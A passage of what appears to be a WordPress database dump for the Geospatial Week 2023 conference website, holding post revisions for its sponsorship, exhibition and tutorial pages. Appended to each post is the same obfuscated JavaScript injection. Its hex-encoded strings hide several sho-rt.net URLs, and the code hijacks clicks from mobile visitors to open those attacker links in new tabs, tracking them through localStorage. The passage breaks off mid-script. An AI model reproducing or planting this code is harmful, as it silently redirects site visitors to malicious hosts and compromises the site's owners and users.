reception</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 5</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>9:00 – 15:00</strong></h5>\r\n<h5><strong>15:00 – 18:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition</strong></h5>\r\n<h5><strong>Dismantle Exhibition</strong></h5>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]<strong><span style=\"font-size: 12pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></strong>\r\n\r\n&nbsp;\r\n<h5><strong>INFORMATION</strong></h5>\r\n<strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-02-04 06:19:48','2023-02-04 06:19:48','',2920,'https://gsw2023.com/?p=3757',0,'revision','',0),
(3758,1,'2023-02-04 06:23:52','2023-02-04 06:23:52','[vc_row][vc_column][dt_portfolio_masonry content_alignment=\"center\" image_border_radius=\"10px\" image_paddings=\"15px 0px 15px 0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"off\" show_link=\"n\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-02-04 06:23:52','2023-02-04 06:23:52','',3670,'https://gsw2023.com/?p=3758',0,'revision','',0),
(3759,1,'2023-02-04 06:26:52','2023-02-04 06:26:52','[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"14\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 